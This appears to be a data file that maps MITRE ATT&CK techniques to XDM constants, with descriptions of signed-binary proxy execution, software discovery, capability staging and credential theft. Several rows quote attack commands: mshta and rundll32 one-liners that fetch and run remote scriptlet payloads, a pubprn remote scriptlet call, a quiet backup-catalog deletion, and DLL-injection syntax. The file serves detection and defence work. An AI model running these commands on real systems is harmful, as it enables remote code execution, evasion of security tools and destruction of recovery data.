T1218.014 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_MMC Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview) For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal) Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the "Link to Web Address" snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg) https://attack.mitre.org/techniques/T1218/014
T1218.013 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_MAVINJECT Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject) Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed) https://attack.mitre.org/techniques/T1218/013
T1218.005 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_MSHTA Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) Mshta.exe is a utility that executes Microsoft HTML Application (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta) https://attack.mitre.org/techniques/T1218/005
T1218.007 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_MSIEXEC Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs. (Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) https://attack.mitre.org/techniques/T1218/007
T1218.008 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_ODBCCONF Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft. Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) https://attack.mitre.org/techniques/T1218/008
T1218.009 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_REGSVCS_OR_REGASM Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm) Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm) https://attack.mitre.org/techniques/T1218/009
T1218.010 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_REGSVR32 Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to a file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016) https://attack.mitre.org/techniques/T1218/010
T1218.011 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_RUNDLL32 Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion) Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) https://attack.mitre.org/techniques/T1218/011
T1218.012 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_VERCLSID Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before it is used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe) Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) https://attack.mitre.org/techniques/T1218/012
T1216 XDM_CONST.MITRE_TECHNIQUE_SIGNED_SCRIPT_PROXY_EXECUTION Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) https://attack.mitre.org/techniques/T1216
T1216.001 XDM_CONST.MITRE_TECHNIQUE_SIGNED_SCRIPT_PROXY_EXECUTION_PUBPRN Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn) Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script. In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). https://attack.mitre.org/techniques/T1216/001
T1072 XDM_CONST.MITRE_TECHNIQUE_SOFTWARE_DEPLOYMENT_TOOLS Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform its intended purpose. https://attack.mitre.org/techniques/T1072
T1518 XDM_CONST.MITRE_TECHNIQUE_SOFTWARE_DISCOVERY Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). https://attack.mitre.org/techniques/T1518
T1518.001 XDM_CONST.MITRE_TECHNIQUE_SOFTWARE_DISCOVERY_SECURITY_SOFTWARE_DISCOVERY Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) https://attack.mitre.org/techniques/T1518/001
T1608 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):
* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)
* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)
https://attack.mitre.org/techniques/T1608
T1608.004 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES_DRIVE_BY_TARGET Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to as a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). https://attack.mitre.org/techniques/T1608/004
T1608.003 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES_INSTALL_DIGITAL_CERTIFICATE Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert) Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). https://attack.mitre.org/techniques/T1608/003
Original Mapped Description
T1608.005 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES_LINK_TARGET Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target; this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. https://attack.mitre.org/techniques/T1608/005
T1608.001 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES_UPLOAD_MALWARE Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files. https://attack.mitre.org/techniques/T1608/001
T1608.002 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES_UPLOAD_TOOL Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo. Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool. https://attack.mitre.org/techniques/T1608/002
T1528 XDM_CONST.MITRE_TECHNIQUE_STEAL_APPLICATION_ACCESS_TOKEN Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) https://attack.mitre.org/techniques/T1528
T1539 XDM_CONST.MITRE_TECHNIQUE_STEAL_WEB_SESSION_COOKIE An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the target's machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypass some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to log in to the corresponding web application. https://attack.mitre.org/techniques/T1539
T1558 XDM_CONST.MITRE_TECHNIQUE_STEAL_OR_FORGE_KERBEROS_TICKETS Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access. On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist) Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Red Hat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT) https://attack.mitre.org/techniques/T1558
T1558.004 XDM_CONST.MITRE_TECHNIQUE_STEAL_OR_FORGE_KERBEROS_TICKETS_AS_REP_ROASTING Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014) For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) https://attack.mitre.org/techniques/T1558/004
T1558.001 XDM_CONST.MITRE_TECHNIQUE_STEAL_OR_FORGE_KERBEROS_TICKETS_GOLDEN_TICKET Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets) The KDC service runs on all domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller. https://attack.mitre.org/techniques/T1558/001
